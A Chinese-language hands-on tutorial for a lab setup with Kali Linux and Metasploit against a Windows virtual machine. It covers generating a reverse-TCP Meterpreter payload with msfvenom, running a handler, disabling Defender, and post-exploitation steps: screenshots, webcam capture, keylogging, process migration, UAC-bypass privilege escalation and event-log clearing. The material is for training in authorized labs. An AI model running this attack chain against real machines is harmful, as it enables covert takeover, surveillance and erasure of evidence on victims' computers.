ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

Kali+Metasploit实战:从环境搭建到Meterpreter后渗透全流程指南

Kali+Metasploit实战:从环境搭建到Meterpreter后渗透全流程指南 做渗透测试这行Kali结合Metasploit也就是大家常说的MSF去打一台Windows几乎可以算是入门必学的“科目二”。很多新手兴冲冲装好Kali打开msfconsole却卡在第一步靶机连不上、会话秒断、生成的exe被杀毒软件吞掉。我见过太多人因为这些问题半途而废其实整套流程只要按顺序捋顺远没有想象中那么玄。这篇我不讲花活就按我本地靶场反复跑过的完整思路把环境搭建、msfvenom生成载荷、handler监听、meterpreter后渗透以及高频坑位全部过一遍。提前说好所有操作都只建议在授权的虚拟机靶场里进行未经授权去动别人的电脑是违法的安全测试的前提永远是授权。1. 万事开头难先把测试靶场搭起来1.1 准备一套可复现的虚拟机环境我推荐的组合是“一台Kali Linux虚拟机 一台Windows虚拟机 VMware Workstation或VirtualBox”。Kali虚拟机建议用最新版官网下载镜像后正常安装即可Windows虚拟机可以选择Windows 7 SP1、Windows 10 LTSC或者Windows Server 2019具体看你练什么。Windows 7老系统漏洞多、提权容易适合第一次跑通流程Windows 10/11更贴近真实办公环境但很多老exp都会失效新手会容易怀疑人生。每台虚拟机装好系统后第一件事是拍快照。拍快照的用处等你把系统搞蓝屏、把管理员密码改掉、或者把payload一运行导致系统异常的时候就会明白——一键还原到初始状态比什么修复手段都省心。我在本地测试时至少会拍两个快照一个是系统刚装完的干净状态另一个是装好常用工具、做好网络配置的状态。还需要注意磁盘空间。Kali本身占用不大Windows虚拟机至少给40GB动态分配空间内存建议各给2GB以上。如果两台虚拟机同时开宿主机内存最好不低于8GB否则运行起来会卡到你怀疑人生。虚拟化开启后64位Windows系统才能正常安装这些基础问题在BIOS里打开Intel VT-x或AMD-V即可。1.2 网络模式与IP规划这是最容易被忽略但最容易翻车的一步。VMware里虚拟机网卡模式有三个选项桥接模式、NAT模式、仅主机模式。我最推荐新手用NAT模式原因很简单Kali和Windows会处在同一个虚拟网段内能互相访问但这个虚拟网段和外部物理网络相对隔离不会一不小心把流量打到真实局域网里。默认NAT模式下Kali和Windows的IP一般长这样Kali是192.168.111.128Windows是192.168.111.129网段由VMware自动分配。你打开Kali终端执行ip a查看网卡IP找到类似eth0下一行的inet地址Windows里打开命令提示符执行ipconfig找到对应网卡的IPv4地址。两边必须在同一个网段并且能互相ping通这是后面一切操作的前提。如果你用的是VirtualBox网络模式默认是NAT注意VirtualBox的NAT默认情况下虚拟机之间不能互通需要额外配置端口转发或者改用“内部网络”或“仅主机网络”。为了少踩坑VMware的NAT模式体验更省心。另外桥接模式我一般不推荐新手尝试它会直接把虚拟机暴露在真实局域网中别人也可能扫到你的虚拟机安全风险完全不可控。验证连通性时在Kali里执行ping 192.168.111.129同时到Windows里执行ping 192.168.111.128。如果单向通、双向不通先检查Windows防火墙和两台虚拟机的网卡是否都正确配置了IP。只要能双向ping通网络这关就算过了。1.3 关掉Windows防火墙减少变量真实渗透测试不会主动去关对方防火墙但我们在本地靶场是为了学流程不是模拟极限攻防。Windows防火墙默认会拦截大部分入站连接而MSF生成的payload用的是反向连接出站流量一般不拦截但Windows Defender的实时防护经常在payload还没落地时就直接查杀所以建议在靶机里做两步操作。第一步关掉Windows防火墙。在Windows控制面板里找到“Windows Defender防火墙”左侧选择“启用或关闭Windows Defender防火墙”把“专用网络”和“公用网络”都设为“关闭”。这一步不是必须的但能让你少排查很多连接问题。第二步处理Windows Defender实时防护。打开“Windows安全中心”进入“病毒和威胁防护”在“病毒和威胁防护设置”里把“实时保护”临时关闭。如果是Windows 7Defender也类似。这里提醒一句这操作只在你自己控制的虚拟机里做真实环境中关防御是违规且危险的别混为一谈。1.4 更新Metasploit到最新Kali装好之后Metasploit框架通常已经内置但版本可能不是最新的。建议先更新一次软件源和MSF命令如下sudo apt update sudo apt install -y metasploit-framework如果你所在环境访问官方源慢可以换成国内镜像源。Kali换源主要是编辑/etc/apt/sources.list把默认源替换为可靠镜像源再执行sudo apt update。这个操作在Kali教程里很常见注意别把源写错就行。第一次启动msfconsole时可能会遇到数据库连接报错那是PostgreSQL服务没启动导致的。按这个顺序处理sudo systemctl start postgresql sudo msfdb init msfconsole启动后你会看到msf6 提示符这就说明MSF已经就绪。数据库初始化好之后以后搜索exp、保存会话都会快很多所以这一步别跳过。2. 动手前必须理解的概念MSF的组件与载荷2.1 认识MSF的四个模块类型Metasploit框架不是单一工具它更像一个“漏洞利用工具箱”。日常接触最多的是四类模块Exploit模块利用漏洞执行的代码例如exploit/windows/smb/ms17_010_eternalblue就是著名的“永恒之蓝”漏洞利用模块。Payload模块漏洞利用成功后要在目标系统上执行的代码比如windows/meterpreter/reverse_tcp。Auxiliary模块扫描、探测、爆破等辅助功能比如端口扫描、SMB版本探测。Post模块拿到会话后做后渗透操作比如提权、信息收集、日志清理。理解了这四个模块你就能看懂MSF里很多命令的路径。例如use exploit/multi/handler里的multi表示这个exploit模块适用于多个平台handler的作用是建立一个监听器等待目标机反向连接而不是真去“攻击”某个漏洞。2.2 为什么监听习惯用reverse_tcpMSF中载荷的连接方式主要分两种正向连接bind_tcp和反向连接reverse_tcp。正向连接就像你在门口等着快递员上门需要你在自己的机器上开放端口还要把端口暴露给外网反向连接则是让快递员主动从目标机里跑出来找你你只需要一个监听端口目标机主动连过来就行。真实场景里目标机器通常在防火墙后面入站流量被过滤得很严但出站流量往往放行所以反向连接成了绝大多数渗透测试的默认选择。用生活化类比更好理解如果你想拿楼下便利店的一瓶水但门口保安不让你进你让店员把水送到你楼下的快递柜这样就绕开了保安。反向连接就是这个思路。MSF的windows/meterpreter/reverse_tcp就是最经典的反向连接载荷它让目标机主动连接你的Kali IP和监听端口。2.3 三种常见载荷怎么选msfvenom生成载荷时-p参数决定了最终载荷类型。新手经常会看到如下几个载荷名称说明适用场景windows/meterpreter/reverse_tcp32位系统常用的Meterpreter反弹载荷兼容性好老系统、32位Windows靶机windows/x64/meterpreter/reverse_tcp64位系统专用内存架构匹配更稳定64位Windows 7/10/11windows/shell/reverse_tcp反弹一个普通cmd shell不加载Meterpreter只需要命令行快速操作时Meterpreter是MSF自带的“后渗透瑞士军刀”它不是一个传统进程而是以内存DLL注入方式运行的提供了文件操作、进程迁移、键盘记录、截图等一系列命令。所以只要系统是64位我一般首选windows/x64/meterpreter/reverse_tcp如果目标不确定是32位还是64位可以用32位windows/meterpreter/reverse_tcp碰碰运气兼容性更好。3. 用msfvenom生成一个能用的Windows载荷3.1 一行命令生成exe先明确一个概念msfvenom本身不对目标发起攻击它只负责“造子弹”。生成的payload.exe运行在Windows上后会主动回连你的Kali监听端口。生成命令如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.111.128 LPORT4444 -f exe -o payload.exe命令解释-p windows/x64/meterpreter/reverse_tcp指定载荷类型。LHOST192.168.111.128填写你Kali的IP地址也就是靶机要回连的地址。这个参数最容易写错后面单独说。LPORT4444监听端口。4444是MSF默认端口但也是最容易和别的程序冲突的端口你可以换成8080、8888、6666这类高位端口。-f exe输出格式是Windows可执行文件。-o payload.exe输出文件名。执行成功后终端会显示类似Payload size: 716 bytes的提示并生成一个payload.exe文件。用file payload.exe可以确认文件格式用ls -lh查看文件大小。正常情况下这个exe大约几百KB太小或太大都要怀疑生成过程是否异常。3.2 LHOST和LPORT是最容易错的地方很多新手拿到的payload明明运行了但Kali那边就是收不到会话十有八九是LHOST填错。注意LHOST不是你的虚拟机名不是域名更不是127.0.0.1。如果你填了127.0.0.1靶机回连的其实是目标自己的本机回环地址这等于快递员把货送到了隔壁楼的103而你在本楼103等永远不可能收到。正确做法是在Kali里执行ip a找到和你Windows靶机同一个网段的那张网卡的IP地址把它填到LHOST里。比如Kali的IP是192.168.111.128Windows是192.168.111.129那么LHOST就必须是192.168.111.128。端口方面优先选择一个防火墙和杀软都不敏感的端口比如8080、443、3389这种常见端口很多安全设备不会重点拦截。还有一个小细节生成payload之前可以先在Kali里执行ss -lntp看看4444端口是否被占用。如果发现端口被其他服务占用就换一个。端口冲突会导致handler启动失败报错非常令人沮丧。3.3 exe、ps1、vbs怎么选实际投递场景里直接扔一个.exe给目标用户很容易引起警觉。MSF提供了-f参数来输出不同格式格式适用场景优点注意点exe双击运行、U盘摆渡兼容性最好操作简单exe文件特征明显杀软查杀率最高ps1PowerShell执行、远程加载可用IEX配合HTTP服务实现无文件执行依赖PowerShell环境部分系统开启受限策略vbs钓鱼附件、脚本诱导伪装性强适合邮件场景需要目标启用WScript运行本篇以exe为例因为它最直观适合你把整个流程跑通。ps1和vbs的生成方式大同小异只需要把-f改成ps1或vbs即可生成的脚本内容再用对应方式执行。3.4 把载荷传到Windows靶机的两种姿势靶机里没有payload整个流程进行不下去。这里提供两种在本地靶场最方便的方法。第一种用Kali自带的HTTP服务传文件。进入payload所在目录执行python3 -m http.server 8080然后在Windows靶机里打开浏览器访问http://192.168.111.128:8080/payload.exe下载完成后把文件放到桌面。这种方法模拟了通过网页下载文件的场景操作最贴近真实环境。第二种直接用虚拟机的共享文件夹。在VMware的虚拟机设置里选择“共享文件夹”添加Kali上的一个目录比如/home/kali/share并勾选“启用”。Windows里访问\\vmware-host\Shared Folders就能看到Kali共享出来的文件。VirtualBox也有类似功能需要安装增强功能才能使用。对于内网靶场来说共享文件夹方式速度最快不依赖网络转发。不管用哪种方式Windows Defender都可能弹出警告甚至直接删除文件。如果弹出先按1.3节的方法关闭实时防护再重新下载或把文件加入信任区。这一步在靶场里没问题但别把这套思路搬到真实环境中。3.5 关于杀毒软件报毒我把话说透我猜一定有人会问为什么我生成的payload.exe一落地就被杀这太正常了。MSF的payload特征是公开且稳定的安全软件完全可以靠特征库扫描出来。这恰恰证明杀毒软件在工作不是你的操作有问题。在靶场里解决报毒的最简方法是关闭Windows Defender的实时保护或者把下载目录加入排除项。在“病毒和威胁防护设置”里把“实时保护”关掉再把拷贝payload的目录加进“排除项”基本就能跑起来。注意这绝不是“免杀”教学。真正的免杀会涉及payload混淆、加壳、签名伪造、白加黑等复杂技术在正规渗透测试中也必须依赖授权和高度的合规审查不是新手阶段该碰的东西。如果你在靶场里都躲不过杀软说明你的环境还缺一个基础条件关闭实时保护。别带着这个半成品去挑战真实机器保护好自己的学习路径和职业底线。4. 配置监听、运行载荷、拿到Meterpreter会话4.1 一个完整的监听配置示例生成payload之后先别急着发出去把Kali监听先架好。我习惯另开一个终端窗口启动msfconsole然后执行以下操作msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload windows/x64/meterpreter/reverse_tcp payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) set LHOST 192.168.111.128 LHOST 192.168.111.128 msf6 exploit(multi/handler) set LPORT 4444 LPORT 4444 msf6 exploit(multi/handler) run这里的关键是exploit/multi/handler本身并不攻击任何漏洞它只负责开启一个监听端口等待目标机器回连。set payload必须和msfvenom生成时选用的payload完全一致否则即使连上双方也互相听不懂对方在说什么。LHOST和LPORT则必须与生成payload时填写的完全一致。run命令会进入监听状态。此时Kali终端会显示[*] Started reverse TCP handler on 192.168.111.128:4444看到这句话说明监听已就绪接下来就可以到Windows靶机上运行payload了。4.2 运行payload与收获会话在Windows靶机上双击刚传过去的payload.exe。如果一切正常Kali的监听终端会跳出这样的信息[*] Sending stage (200774 bytes) to 192.168.111.129 [*] Meterpreter session 1 opened (192.168.111.128:4444 - 192.168.111.129:49164) meterpreter 命令行提示符从msf6 变成了meterpreter 意味着你已经成功拿到了一个Meterpreter会话。到这一步常规意义上的“拿下Windows电脑”就已经形成了。此时在meterpreter里执行sysinfo就能看到目标系统的版本、架构、语言等信息。有时双击payload.exe后Windows界面没有任何反应这是正常的。很多payload运行后进程会隐藏或快速退出真正的动作发生在内存中只需要盯住Kali的监听窗口别去反复双击。如果Kali一直没反应说明某个环节出了问题进入第6章按排查表逐项检查。4.3 会话常见操作挂后台与切换拿到会话后通常不会一直停留在meterpreter里因为后续可能还要加载其他模块或进行提权。我可以先执行background把当前会话放到后台meterpreter background [*] Backgrounding session 1... msf6 然后执行sessions查看已有会话列表会出现类似1 meterpreter x64/windows 192.168.111.129的记录。要回到某个会话执行msf6 sessions -i 1切换会话后命令行又会变回meterpreter 。这套操作在提权、加载后渗透模块时经常用到一定要练熟。还有一个小技巧在meterpreter里输入help可以查看所有可用命令列表比死记命令高效得多。4.4 会话不稳定先查这三处我遇到过很多次会话刚建立几秒钟就断开或者连不上。常见原因有三类按顺序排查第一Windows防火墙是否拦截了出站连接。虽然reverse_tcp是出站流量但部分安全策略会拦截Meterpreter的后续stage传输最方便的办法还是关闭Windows防火墙。第二LHOST、LPORT是否在payload和handler两边保持一致。一个字母不对都会前功尽弃。第三杀软是否已经清掉了payload进程。如果Windows显示文件被隔离那会话自然秒断。排查时可以在Kali里执行ss -lntp | grep 4444确认监听端口还在再用nc -nv 192.168.111.128 4444测试端口是否可达。如果端口没问题再回头看Windows侧的防护。5. 拿到会话之后后渗透环节怎么玩5.1 先收集信息再动手拿到Meterpreter会话并不意味着可以无脑执行各种命令。正确的后渗透思路是“先侦察后行动”。我会依次执行这组命令meterpreter sysinfo meterpreter getuid meterpreter ipconfig meterpreter arp meterpreter route meterpreter pssysinfo查看操作系统版本、架构和主机名判断目标是不是64位系统。getuid查看当前用户权限一般是普通用户或管理员。ipconfig查看网卡信息和IP地址判断是否处于内网。arp查看内网邻居列表能发现其他存活主机。route查看路由表为后续横向移动做准备。ps查看进程列表找出可以迁移的稳定进程和可能的高权限进程。这些信息能帮你判断下一步该提权还是横向移动。新手最容易忽略getuid其实它直接决定了你能执行哪些操作。5.2 “看对方屏幕”是通过screenshot实现的很多人学MSF冲的就是“创建载荷之后怎么看别人的屏幕”。Meterpreter里最直接的命令是screenshotmeterpreter screenshot Screenshot saved to: /home/kali/.msf4/loot/20250101120000_default_192.168.111.129_screenshot_123456.jpg执行成功后Kali终端会显示截图保存路径到对应目录打开图片即可。这就是“看屏幕”最朴素的实现。如果你想调用目标摄像头可以试试webcam_snap它会拍一张摄像头照片。不过虚拟机如果没有虚拟摄像头这个命令会报错需要先给虚拟机添加一个虚拟摄像头设备才能演示。还有一个命令是keyscan_start和keyscan_dump分别开启键盘记录和导出记录。这是典型的敏感操作能在很多实战场景派上用场但同时也意味着高度敏感使用前必须确保自己拥有合法授权否则后果相当严重。需要说明的是screenshot截下来的是一张静态图片不是实时直播。想要实时看屏还需要额外工具或后渗透模块多数情况下并不稳定。对于学习阶段掌握screenshot足够理解Meterpreter的能力边界了。5.3 文件上传下载和进程迁移文件操作是后渗透的基础功。上传文件的命令是upload下载是download搜索文件用searchmeterpreter upload /home/kali/tools.exe C:\\Users\\test\\Desktop\\ meterpreter download C:\\Users\\test\\Desktop\\flag.txt /home/kali/ meterpreter search -f *.docxWindows路径里的反斜杠需要写成\\转义否则Meterpreter会把\U、\t这些当成特殊字符。如果不想纠结也可以直接用正斜杠比如C:/Users/test/Desktop/Meterpreter通常能识别。进程迁移是让会话更稳定的常规操作。先ps找到explorer.exe或svchost.exe的PID然后执行meterpreter migrate 1234迁移成功后你的会话会“寄生”在这个进程里。如果之前的载荷进程被用户关闭或杀软结束会话依然存活。不过千万别随便迁移到System进程比如winlogon.exe一旦操作失误可能导致目标系统蓝屏你的会话也会跟着消失。5.4 从普通权限到system权限后渗透通常逃不开提权。最省事的命令是getsystem它内部会尝试多种提权方式把当前会话权限提升到NT AUTHORITY\SYSTEMmeterpreter getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))如果返回这样的提示说明你已经拿到了系统最高权限。但实际情况是getsystem在Win10、Win11这些新系统上成功率很低因为微软堵住了很多利用路径。更通用的做法是先把会话挂到后台调用local_exploit_suggester来列出潜在提权模块meterpreter background msf6 use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) set SESSION 1 msf6 post(multi/recon/local_exploit_suggester) run它会扫描当前系统有哪些可利用的本地提权漏洞并推荐对应模块。看到推荐后就可以use对应的exploit模块设置SESSION、LHOST、LPORT重新反弹一个高权限会话。常见的bypassuac_fodhelper模块操作流程大致如下msf6 use exploit/windows/local/bypassuac_fodhelper msf6 exploit(windows/local/bypassuac_fodhelper) set SESSION 1 msf6 exploit(windows/local/bypassuac_fodhelper) set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_fodhelper) set LHOST 192.168.111.128 msf6 exploit(windows/local/bypassuac_fodhelper) set LPORT 5555 msf6 exploit(windows/local/bypassuac_fodhelper) run新会话建立后再执行getsystem往往就能成功。但提权不是炫技更不是结果真正的渗透测试需要把权限转化为业务价值比如访问敏感数据或证明风险路径。没有授权的环境里这些都千万别乱试。5.5 靶场演示完怎么收尾每次演示完很多新手会直接关虚拟机但这会留下“脏”状态。最推荐的收尾方式是恢复快照在VMware中右键虚拟机选择“快照”-“恢复到初始状态”这样整个系统就回到实验前的干净环境下次再练也不会被上次的残留干扰。如果你不想恢复快照至少要把生成的payload.exe从Windows里删掉关闭Kali的http server。Meterpreter里还有一个clearev命令可以清除Windows事件日志这在真实渗透中属于“清洗痕迹”范畴但用来掩盖非法行为就是另一回事了。正规安全测试里有合规的处置方式不是把日志删了就万事大吉这个度必须把握好。6. 高频问题排查与避坑实录6.1 无法连接、会话秒断问题如果整套流程跑不通先别怀疑人生按下面这个顺序逐项定位两台虚拟机能否互相ping通不通就检查网络模式和防火墙。handler是否开启成功终端里是否显示Started reverse TCP handler。payload里的LHOST和handler里的LHOST是否完全一致LPORT是否一致Windows Defender是否删除了payload去“威胁历史记录”里看有没有隔离记录。是否选错了payload架构在64位系统里硬跑32位载荷大多数情况下也能兼容但稳定性差很多。我在实践中遇到最多的问题是Kali重启后IP变了但是payload还是用旧的IP生成。解决办法很简单生成payload、配置handler前先确认当前Kali的IP再统一填写。记不住就打一张小抄贴在屏幕上这个方法比乱试强多了。6.2 启动msfconsole卡顿或报数据库错误新装的Kali第一次执行msfconsole如果报错[-] Failed to connect to the database: could not connect to server十有八九是PostgreSQL没启动。执行sudo systemctl start postgresql sudo msfdb init之后再启动msfconsole就正常了。如果启动过程特别慢先检查数据库有没有初始化因为MSF默认会连数据库做缓存连不上就会反复尝试导致卡顿。如果因为网络原因更新源很慢可以考虑把Kali软件源换成国内镜像。但注意这一步和任何“代理”无关纯粹是apt源的选择问题。换源后执行sudo apt update确认成功再继续。6.3 payload一执行就被杀这个问题我在3.5节说过一半这里再补全。payload被杀通常是特征库识别和实时防护共同作用的结果。靶场里两步走关闭Windows Defender实时保护。把存放payload的目录加入“排除项”这样即使payload运行后触发行为检测也不会被立即隔离。如果你关掉实时保护后还是被杀检查你是否开启了“云提供的保护”和“自动提交样本”这两个功能会把文件传到微软云端做分析即使本地关了实时保护也可能被云查杀。全部关掉再试一次。在这里再强调一次这不是免杀技术只是靶场环境里的操作简化。真正绕过杀软是红队攻防的高深课题而且需要授权、需要评估法律边界不适合在入门阶段讨论更不该拿别人的电脑练手。6.4 截屏黑屏怎么办screenshot返回一张黑屏通常是会话运行在非交互桌面上比如服务会话或Session 0隔离环境。想截到当前登录用户桌面最有效的办法是先迁移到用户进程explorer.exe再执行截图meterpreter ps meterpreter migrate explorer的PID meterpreter screenshot如果迁移后依然黑屏检查虚拟机是否处于锁屏状态。锁屏状态下截到的就是锁屏界面这是正常现象不是错误。如果你需要模拟一个“活跃用户”环境可以在Windows虚拟机里设置不自动锁屏保持桌面处于登录后状态。6.5 Windows版本与提权效果很多新手误以为MSF能通杀所有Windows系统这其实是个误区。不同版本和补丁级别直接影响exp的可用性。我整理了一份实际测试经验供参考目标系统exp成功率建议Windows 7 SP1未打补丁很高跑通流程首选Windows 10 老版本如1909前中等可尝试多种bypassuac模块Windows 10/11最新补丁低更多要靠配置错误和服务漏洞Windows Server 2019/2022低需要结合具体业务场景如果你只是想练习MSF的基础用法建议装一个Windows 7 SP1靶机。老系统不仅能让你体验完整的渗透流程还能让你更深刻地理解提权原理。新系统打满补丁后连不上不是技术问题而是环境本就不容易不必焦虑。6.6 常见问题速查表现象可能原因解决方案会话无法建立IP不一致、防火墙拦截、端口被占用检查LHOST/LPORT关闭防火墙建立后立即断开杀软清除payload、架构不匹配关闭Defender实时保护用x64载荷双击payload无反应payload进程在后台回连盯住监听窗口不要重复双击上传/下载路径报错反斜杠未转义使用C:/Users/test/Desktop/格式截屏黑屏非交互会话或锁屏migrate到explorer.exe后重试getsystem失败系统补丁太新用local_exploit_suggester扫描提权点msfconsole启动卡PostgreSQL未启动启动postgresql并msfdb initpayload文件被杀Defender实时防护临时关闭或添加排除项说实话kalimsf这套组合真正难的不是命令而是环境与细节。每一条命令背后的逻辑搞清楚比硬背一百条命令有用。我个人常踩的坑就两个一是LHOST写错二是Windows防火墙忘了关。如果你能完整跑通上面流程恭喜你你已经拿到了进入渗透测试世界的第一张门票。最后再重复一遍授权授权还是授权。没有授权的一切测试行为都不可取希望这篇能帮你稳稳地迈出第一步。
返回列表